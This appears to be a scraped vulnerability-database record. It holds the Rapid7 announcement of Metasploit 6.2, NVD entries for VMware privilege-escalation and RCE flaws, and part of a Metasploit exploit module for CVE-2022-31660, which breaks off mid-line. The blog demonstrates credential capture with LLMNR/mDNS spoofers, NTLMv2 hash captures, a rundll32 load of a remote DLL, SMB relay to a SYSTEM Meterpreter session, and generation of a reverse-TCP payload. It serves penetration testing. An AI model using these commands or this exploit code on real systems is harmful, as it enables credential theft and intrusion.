plugin](<https://github.com/rapid7/metasploit-framework/pull/16298>) can also streamline this process for users. The capture plugin currently starts 13 different services (17 including SSL-enabled versions) on the same listening IP address including remote interfaces via Meterpreter.\n\nAfter running the `load capture` command, the `captureg` command is available (for Capture-Global), which then offers start and stop subcommands. A configuration file can be used to select individual services to start.\n\nIn the following example, the plugin is loaded, and then all default services are started on the 192.168.123.128 interface:\n \n \n msf6 > load capture\n [*] Successfully loaded plugin: Credential Capture\n msf6 > captureg start --ip 192.168.123.128\n Logging results to /home/kali/.msf4/logs/captures/capture_local_20220518185845_205939.txt\n Hash results stored in /home/kali/.msf4/loot/captures/capture_local_20220518185845_846339\n [+] Authentication Capture: DRDA (DB2, Informix, Derby) started\n [+] Authentication Capture: FTP started\n [+] HTTP Client MS Credential Catcher started\n [+] HTTP Client MS Credential Catcher started\n [+] Authentication Capture: IMAP started\n [+] Authentication Capture: MSSQL started\n [+] Authentication Capture: MySQL started\n [+] Authentication Capture: POP3 started\n [+] Authentication Capture: PostgreSQL started\n [+] Printjob Capture Service started\n [+] Authentication Capture: SIP started\n [+] Authentication Capture: SMB started\n [+] Authentication Capture: SMTP started\n [+] Authentication Capture: Telnet started\n [+] Authentication Capture: VNC started\n [+] Authentication Capture: FTP started\n [+] Authentication Capture: IMAP started\n [+] Authentication Capture: POP3 started\n [+] Authentication Capture: SMTP started\n [+] NetBIOS Name Service Spoofer started\n [+] LLMNR Spoofer started\n [+] mDNS Spoofer started\n [+] Started capture jobs\n \n\nOpening a new terminal in conjunction with the `tail` command will show everything that has been captured. For instance, NTLMv2-SSP details through the SMB capture module:\n \n \n $ tail -f ~/.msf4/logs/captures/capture_local_20220518185845_205939.txt\n \n [+] Received SMB connection on Auth Capture Server!\n [SMB] NTLMv2-SSP Client : 192.168.123.136\n [SMB] NTLMv2-SSP Username : EXAMPLE\\Administrator\n [SMB] NTLMv2-SSP Hash : Administrator::EXAMPLE:1122334455667788:c77cd466c410eb0721e4936bebd1c35b:0101000000000000009391080b6bd8013406d39c880c5a66000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f007500730007000800009391080b6bd801060004000200000008003000300000000000000001000000002000009eee3e2f941900a084d7941d60cbd5e04f91fbf40f59bfa4ed800b060921a6740a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100320033002e003100320038000000000000000000\n \n\nIt is also possible to log directly to stdout without using the `tail` command:\n \n \n captureg start --ip 192.168.123.128 --stdout\n \n\n## SMB v3 server support\n\nThis work builds upon the SMB v3 client support [added in Metasploit 6.0](<https://www.rapid7.com/blog/post/2020/08/06/metasploit-6-now-under-active-development/>).\n\nMetasploit 6.2.0 contains a new standalone tool for spawning an SMB server that allows read-only access to the current working directory. This new SMB server functionality supports SMB v1/2/3, as well as encryption support for SMB v3.\n\nExample usage:\n \n \n ruby tools/smb_file_server.rb --share-name home --username metasploit --password password --share-point\n \n\nThis can be useful for copying files onto remote targets, or for running remote DLLs:\n \n \n copy \\\\192.168.123.1\\home\\example.txt .\n rundll32.exe \\\\192.168.123.1\\home\\example.dll,0\n \n\nAll remaining Metasploit modules have now been updated to support SMB v3. Some examples:\n\n * `exploit/windows/smb/smb_delivery`: This module outputs a rundll32 command that you can invoke on a remote machine to open a session, such as `rundll32.exe \\\\192.168.123.128\\tHKPx\\WeHnu,0`\n * `exploit/windows/smb/capture`: This module creates a mock SMB server that accepts credentials before returning `NT_STATUS_LOGON_FAILURE`. Supports SMB v1, SMB v2, and SMB v3 and captures NTLMv1 and NTLMv2 hashes, which can be used for offline password cracking\n * `exploit/windows/dcerpc/cve_2021_1675_printnightmare`: This update is an improved, all-inclusive exploit that uses the new SMB server, making it unnecessary for the user to deal with Samba.\n * `exploit/windows/smb/smb_relay`: Covered in more detail below.\n\n## Enhanced SMB relay support\n\nThe `windows/smb/smb_relay` has been updated so users can now relay over SMB versions 2 and 3. In addition, the module can now select multiple targets that Metasploit will intelligently cycle through to ensure that it is not wasting incoming connections.\n\nExample module usage:\n \n \n use windows/smb/smb_relay\n set RELAY_TARGETS 192.168.123.4 192.168.123.25\n set JOHNPWFILE ./relay_results.txt\n run\n \n\nIncoming requests have their hashes captured, as well as being relayed to additional targets to run psexec:\n \n \n msf6 exploit(windows/smb/smb_relay) > [*] New request from 192.168.123.22\n [*] Received request for \\admin\n [*] Relaying to next target smb://192.168.123.4:445\n [+] identity: \\admin - Successfully authenticated against relay target smb://192.168.123.4:445\n [SMB] NTLMv2-SSP Client : 192.168.123.4\n [SMB] NTLMv2-SSP Username : \\admin\n [SMB] NTLMv2-SSP Hash : admin:::ecedb28bc70302ee:a88c85e87f7dca568c560a49a01b0af8:0101000000000000b53a334e842ed8015477c8fd56f5ed2c0000000002001e004400450053004b0054004f0050002d004e0033004d00410047003500520001001e004400450053004b0054004f0050002d004e0033004d00410047003500520004001e004400450053004b0054004f0050002d004e0033004d00410047003500520003001e004400450053004b0054004f0050002d004e0033004d00410047003500520007000800b53a334e842ed80106000400020000000800300030000000000000000000000000300000174245d682cab0b73bd3ee3c11e786bddbd1a9770188608c5955c6d2a471cb180a001000000000000000000000000000000000000900240063006900660073002f003100390032002e003100360038002e003100320033002e003100000000000000000000000000\n \n [*] Received request for \\admin\n [*] identity: \\admin - All targets relayed to\n [*] 192.168.123.4:445 - Selecting PowerShell target\n [*] Received request for \\admin\n [*] identity: \\admin - All targets relayed to\n [*] 192.168.123.4:445 - Executing the payload...\n [+] 192.168.123.4:445 - Service start timed out, OK if running a command or non-service executable...\n [*] Sending stage (175174 bytes) to 192.168.123.4\n [*] Meterpreter session 1 opened (192.168.123.1:4444 -> 192.168.123.4:52771 ) at 2022-03-02 22:24:42 +0000\n \n\nA session will be opened on the relay target with the associated credentials:\n \n \n msf6 exploit(windows/smb/smb_relay) > sessions\n \n Active sessions\n ===============\n \n Id Name Type Information Connection\n -- ---- ---- ----------- ----------\n 1 meterpreter x86/windows NT AUTHORITY\\SYSTEM @ DESKTOP-N3MAG5R 192.168.123.1:4444 -> 192.168.123.4:52771 (192.168.123.4)\n \n\nFurther details can be found in the [Metasploit SMB Relay documentation](<https://github.com/rapid7/metasploit-framework/blob/3b524360ed8c40ff765aa3db5de96a441387035f/documentation/modules/exploit/windows/smb/smb_relay.md>).\n\n## Improved pivoting / NATed services support\n\nMetasploit has added features to libraries that provide listening services (like HTTP, FTP, LDAP, etc) to allow them to be bound to an explicit IP address and port combination that is independent of what is typically the SRVHOST option. This is particularly useful for modules that may be used in scenarios where the target needs to connect to Metasploit through either a NAT or port-forward configuration. The use of this feature mimics the existing functionality that\u2019s provided by the reverse_tcp and reverse_http(s) payload stagers.\n\nWhen a user needs the target to connect to 10.2.3.4, the Metasploit user would set that as the SRVHOST. If, however, that IP address is the external interface of a router with a port forward, Metasploit won\u2019t be able to bind to it. To fix that, users can now set the ListenerBindAddress option to one that Metasploit can listen on \u2014 in this case, the IP address that the router will forward the incoming connection to.\n\nFor example, with the network configuration:\n\nPrivate IP: 172.31.21.26 (where Metasploit can bind to) \nExternal IP: 10.2.3.4 (where the target connects to Metasploit)\n\nThe Metasploit module commands would be:\n \n \n # Set where the target connects to Metasploit. ListenerBindAddress is a new option.\n set srvhost 10.2.3.4\n set ListenerBindAddress 172.31.21.26\n \n # Set where Metasploit will bind to. ReverseListenerBindAddress is an existing option.\n set lhost 10.2.3.4\n set ReverseListenerBindAddress 172.31.21.26\n \n\n## Debugging Meterpreter sessions\n\nThere are now two ways to debug Meterpreter sessions:\n\n 1. Log all networking requests and responses between msfconsole and Meterpreter, i.e. TLV packets\n 2. Generate a custom Meterpreter debug build with extra logging present\n\n**Log Meterpreter TLV packets**\n\nThis can be enabled for any Meterpreter session and does not require a special debug Metasploit build:\n \n \n msf6 > setg SessionTlvLogging true\n SessionTlvLogging => true\n \n\nHere\u2019s an example of logging the network traffic when running the `getenv` Meterpreter command:\n \n \n meterpreter > getenv USER\n \n SEND: #<Rex::Post::Meterpreter::Packet type=Request tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv>\n #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value=\"73717259684850511890564936718272\">\n #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value=\"USER\">\n ]>\n \n RECV: #<Rex::Post::Meterpreter::Packet type=Response tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=UUID meta=RAW value=\"Q\\xE63_onC\\x9E\\xD71\\xDE3\\xB5Q\\xE24\">\n #<Rex::Post::Meterpreter::Tlv type=COMMAND_ID meta=INT value=1052 command=stdapi_sys_config_getenv>\n #<Rex::Post::Meterpreter::Tlv type=REQUEST_ID meta=STRING value=\"73717259684850511890564936718272\">\n #<Rex::Post::Meterpreter::Tlv type=RESULT meta=INT value=0>\n #<Rex::Post::Meterpreter::GroupTlv type=ENV_GROUP tlvs=[\n #<Rex::Post::Meterpreter::Tlv type=ENV_VARIABLE meta=STRING value=\"USER\">\n #<Rex::Post::Meterpreter::Tlv type=ENV_VALUE meta=STRING value=\"demo_user\">\n ]>\n ]>\n \n Environment Variables\n =====================\n \n Variable Value\n -------- -----\n USER demo_user\n \n\n**Meterpreter debug builds**\n\nWe have added additional options to Meterpreter payload generation for generating debug builds that will have additional log statements present. These payloads can be useful for debugging Meterpreter sessions, when developing new Meterpreter features, or for raising Metasploit issue reports etc. To choose a prebuilt Meterpreter payload with debug functionality present, set `MeterpreterDebugBuild` to true. There is also configuration support for writing the log output to stdout or to a file on the remote target by setting `MeterpreterDebugLogging` to `rpath:/tmp/meterpreter_log.txt`.\n\nFor example, within msfconsole you can generate a new payload and create a handler:\n \n \n use payload/python/meterpreter_reverse_tcp\n generate -o shell.py -f raw lhost=127.0.0.1 MeterpreterDebugBuild=true MeterpreterTryToFork=false\n to_handler\n \n\nRunning the payload will show the Meterpreter log output:\n \n \n $ python3 shell.py\n DEBUG:root:[*] running method core_negotiate_tlv_encryption\n DEBUG:root:[*] Negotiating TLV encryption\n DEBUG:root:[*] RSA key: 30820122300d06092a864886f70d01010105000382010f003082010a0282010100aa0f09225ff311d136b7c2ed02e5f4c819a924bd59a2ba67ea3e36c837c1d28ba97db085acad9374a543ad0709006d835c80aa273138948ec9ff699142405819e68b8dbc3c04300dc2a93a5be4be2263b69e8282447b6250abad8056de6e7f83b20c6151d72af63c908fa5b0c3ab3a4ac92d8b335a284b0542e3bf9ef10456024df2581b22f233a84e69d41d721aa00e23ba659c4420123d5fdd78ac061ffcb74e5ba60fece415c2be982df57d13afc107b8522dc462d08247e03d63b0d6aa639784e7187384c315147a7d18296f09495ba7969da01b1fb49097295792572a01acdaf7406f2ad5b25d767d8695cc6e33d33dfeeb158a6f50d43d07dd05aa19ff0203010001\n DEBUG:root:[*] AES key: 0x121565e60770fccfc7422960bde14c12193baa605c4fdb5489d9bbd6b659f966\n DEBUG:root:[*] Encrypted AES key: 0x741a972aa2e95260279dc658f4b611ca2039a310ebb834dee47342a5809a68090fed0a87497f617c2b04ecf8aa1d6253cda0a513ccb53b4acc91e89b95b198dce98a0908a4edd668ff51f2fa80f4e2c6bc0b5592248a239f9a7b30b9e53a260b92a3fdf4a07fe4ae6538dfc9fa497d02010ee67bcf29b38ec5a81d62da119947a60c5b35e8b08291825024c734b98c249ad352b116618489246aebd0583831cc40e31e1d8f26c99eb57d637a1984db4dc186f8df752138f798fb2025555802bd6aa0cebe944c1b57b9e01d2d9d81f99a8195222ef2f32de8dfbc150286c122abdc78f19246e5ad65d765c23ba762fe95182587bd738d95814a023d31903c2a46\n DEBUG:root:[*] TLV encryption sorted\n DEBUG:root:[*] sending response packet\n DEBUG:root:[*] running method core_set_session_guid\n DEBUG:root:[*] sending response packet\n DEBUG:root:[*] running method core_enumextcmd\n DEBUG:root:[*] sending response packet\n DEBUG:root:[*] running method core_enumextcmd\n DEBUG:root:[*] sending response packet\n ... etc ...\n \n\nFor full details, see the [Debugging Meterpreter Sessions documentation](<https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html>).\n\n## User-contributable docs\n\nWe have now released user-contributable documentation for Metasploit, available at <https://docs.metasploit.com/>. This new site provides a searchable source of information for multiple topics including:\n\n * [Common Metasploit workflows](<https://docs.metasploit.com/docs/pentesting/>)\n * [Upgrading shells to Meterpreter](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-upgrading-shells-to-meterpreter.html>)\n * [Kubernetes](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-kubernetes.html>)\n * [MySQL](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-mysql.html>)\n * [PostgreSQL](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-postgresql.html>)\n * [SMB](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-smb.html>)\n * [SSH](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-ssh.html>)\n * [WinRM](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-winrm.html>)\n * [Installation guides](<https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html>)\n * [Module development resources](<https://docs.metasploit.com/docs/development/developing-modules/guides/>)\n * ... and more!\n\nContributions are welcome, and the Markdown files can now be found within the Metasploit framework repo, under the [docs folder](<https://github.com/rapid7/metasploit-framework/tree/master/docs>).\n\n## Local exploit suggester improvements\n\nThe `post/multi/recon/local_exploit_suggester` post module can be used to iterate through multiple relevant Metasploit modules and automatically check for local vulnerabilities that may lead to privilege escalation.\n\nNow with Metasploit 6.2, this module has been updated with a number of bug fixes, as well as improved UX that more clearly highlights which modules are viable:\n \n \n msf6 post(multi/recon/local_exploit_suggester) > run session=-1\n ... etc ...\n [*] ::1 - Valid modules for session 3:\n ============================\n # Name Potentially Vulnerable? Check Result\n - ---- ----------------------- ------------\n 1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.\n 2 exploit/linux/local/cve_2022_0847_dirtypipe Yes The target appears to be vulnerable. Linux kernel version found: 5.14.0\n 3 exploit/linux/local/cve_2022_0995_watch_queue Yes The target appears to be vulnerable.\n 4 exploit/linux/local/desktop_privilege_escalation Yes The target is vulnerable.\n 5 exploit/linux/local/network_manager_vpnc_username_priv_esc Yes The service is running, but could not be validated.\n 6 exploit/linux/local/pkexec Yes The service is running, but could not be validated.\n 7 exploit/linux/local/polkit_dbus_auth_bypass Yes The service is running, but could not be validated. Detected polkit framework version 0.105.\n 8 exploit/linux/local/su_login Yes The target appears to be vulnerable.\n 9 exploit/android/local/futex_requeue No The check raised an exception.\n 10 exploit/linux/local/abrt_raceabrt_priv_esc No The target is not exploitable.\n 11 exploit/linux/local/abrt_sosreport_priv_esc No The target is not exploitable.\n 12 exploit/linux/local/af_packet_chocobo_root_priv_esc No The target is not exploitable. Linux kernel 5.14.0-kali4-amd64 #1 is not vulnerable\n 13 exploit/linux/local/af_packet_packet_set_ring_priv_esc No The target is not exploitable.\n 14 exploit/linux/local/apport_abrt_chroot_priv_esc No The target is not exploitable.\n 15 exploit/linux/local/asan_suid_executable_priv_esc No The check raised an exception.\n 16 exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc No The target is not exploitable.\n \n\nSetting the option `verbose=true` will now also highlight modules that weren\u2019t considered as part of the module suggestion phase due to session platform/arch/type mismatches. This is useful for evaluating modules that may require manually migrating from a shell session to Meterpreter, or from a Python Meterpreter to a native Meterpreter to gain local privilege escalation.\n\n## Upcoming roadmap work\n\nIn addition to the normal module development release cycle, the Metasploit team has now begun work on adding Kerberos authentication support as part of a planned Metasploit 6.3.0 release.\n\n## Get it\n\nExisting Metasploit Framework users can update to the latest release of Metasploit Framework via the `msfupdate` command.\n\nNew users can either download the latest release through our [nightly installers](<https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html>), or if you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest release.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-09T16:39:00", "type": "rapid7blog", "title": "Announcing Metasploit 6.2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-0847", "CVE-2022-1388", "CVE-2022-21999", "CVE-2022-22954", "CVE-2022-30525"], "modified": "2022-06-09T16:39:00", "id": "RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "href": "https://blog.rapid7.com/2022/06/09/announcing-metasploit-6-2/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-02-09T14:27:15", "description": "VMware Workspace ONE Access, Identity Manager and vRealize Automation contain two privilege escalation vulnerabilities. A malicious actor with local access can escalate privileges to 'root'.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T16:15:00", "type": "cve", "title": "CVE-2022-31661", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-31661"], "modified": "2022-08-11T16:11:00", "cpe": ["cpe:/a:vmware:identity_manager_connector:3.3.5", "cpe:/a:vmware:identity_manager_connector:3.3.4", "cpe:/a:vmware:identity_manager:3.3.5", "cpe:/a:vmware:identity_manager:3.3.4", "cpe:/a:vmware:one_access:21.08.0.1", "cpe:/a:vmware:identity_manager_connector:19.03.0.1", "cpe:/a:vmware:identity_manager_connector:3.3.6", "cpe:/a:vmware:access_connector:22.05", "cpe:/a:vmware:access_connector:21.08.0.0", "cpe:/a:vmware:identity_manager:3.3.6", "cpe:/a:vmware:access_connector:21.08.0.1", "cpe:/a:vmware:one_access:21.08.0.0"], "id": "CVE-2022-31661", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31661", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:vmware:identity_manager:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:19.03.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:22.05:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.5:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:27:15", "description": "VMware Workspace ONE Access, Identity Manager and vRealize Automation contains a privilege escalation vulnerability. A malicious actor with local access can escalate privileges to 'root'.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T16:15:00", "type": "cve", "title": "CVE-2022-31660", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-31660"], "modified": "2022-08-11T16:10:00", "cpe": ["cpe:/a:vmware:identity_manager_connector:3.3.5", "cpe:/a:vmware:identity_manager_connector:3.3.4", "cpe:/a:vmware:identity_manager:3.3.5", "cpe:/a:vmware:identity_manager:3.3.4", "cpe:/a:vmware:one_access:21.08.0.1", "cpe:/a:vmware:identity_manager_connector:19.03.0.1", "cpe:/a:vmware:identity_manager_connector:3.3.6", "cpe:/a:vmware:access_connector:22.05", "cpe:/a:vmware:access_connector:21.08.0.0", "cpe:/a:vmware:identity_manager:3.3.6", "cpe:/a:vmware:access_connector:21.08.0.1", "cpe:/a:vmware:one_access:21.08.0.0"], "id": "CVE-2022-31660", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31660", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:vmware:identity_manager:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:19.03.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:22.05:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.5:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:09:50", "description": "VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T20:15:00", "type": "cve", "title": "CVE-2022-22954", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-09-09T16:47:00", "cpe": ["cpe:/a:vmware:cloud_foundation:4.3.1", "cpe:/a:vmware:identity_manager:3.3.5", "cpe:/a:vmware:workspace_one_access:20.10.0.0", "cpe:/a:vmware:workspace_one_access:21.08.0.1", "cpe:/a:vmware:identity_manager:3.3.4", "cpe:/a:vmware:vrealize_automation:7.6", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.2", "cpe:/a:vmware:identity_manager:3.3.3", "cpe:/a:vmware:workspace_one_access:20.10.0.1", "cpe:/a:vmware:workspace_one_access:21.08.0.0", "cpe:/a:vmware:identity_manager:3.3.6", "cpe:/a:vmware:vrealize_automation:8.6"], "id": "CVE-2022-22954", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22954", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:vmware:identity_manager:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_automation:8.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workspace_one_access:20.10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_automation:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workspace_one_access:20.10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workspace_one_access:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workspace_one_access:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.5:*:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2022-11-03T06:44:20", "description": "VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of the root user by modifying a file and then restarting the vmware-certproxy service which invokes it. The service control is permitted via the sudo configuration without a password.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-02T16:13:28", "type": "metasploit", "title": "VMware Workspace ONE Access CVE-2022-31660", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-31660"], "modified": "2022-08-03T21:45:06", "id": "MSF:EXPLOIT-LINUX-LOCAL-VMWARE_WORKSPACE_ONE_ACCESS_CERTPROXY_LPE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/local/vmware_workspace_one_access_certproxy_lpe/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Post::File\n include Msf::Post::Unix\n\n TARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'VMware Workspace ONE Access CVE-2022-31660',\n 'Description' => %q{\n VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges\n to those of the root user by modifying a file and then restarting the vmware-certproxy service which\n invokes it. The service control is permitted via the sudo configuration without a password.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Spencer McIntyre'\n ],\n 'Platform' => [ 'linux', 'unix' ],\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [\n [ 'Automatic', {} ],\n ],\n 'DefaultOptions' => {\n 'PrependFork' => true,\n 'MeterpreterTryToFork' => true\n },\n 'Privileged' => true,\n 'DefaultTarget' => 0,\n 'References' => [\n [ 'CVE', '2022-31660' ],\n [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ]\n ],\n 'DisclosureDate' => '2022-08-02',\n 'Notes' => {\n # We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service\n # is disabled by default though.\n 'Stability' => [CRASH_SERVICE_DOWN],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [ARTIFACTS_ON_DISK]\n }\n }\n )\n )\n end\n\n def certproxy_service\n # this script's location depends on the version, so find it.\n return @certproxy_service if @certproxy_service\n\n @certproxy_service = [\n '/usr/local/horizon/scripts/certproxyService.sh',\n '/opt/vmware/certproxy/bin/certproxyService.sh'\n ].find { |path| file?(path) }\n\n vprint_status(\"Found service control script at: #{@certproxy_service}\") if @certproxy_service\n @certproxy_service\n end\n\n def sudo(arguments)\n cmd_exec(\"sudo --non-interactive #{arguments}\")\n end\n\n def check\n unless whoami == 'horizon'\n return CheckCode::Safe('Not running as the horizon user.')\n end\n\n token = Rex::Text.rand_text_alpha(10)\n unless sudo(\"--list 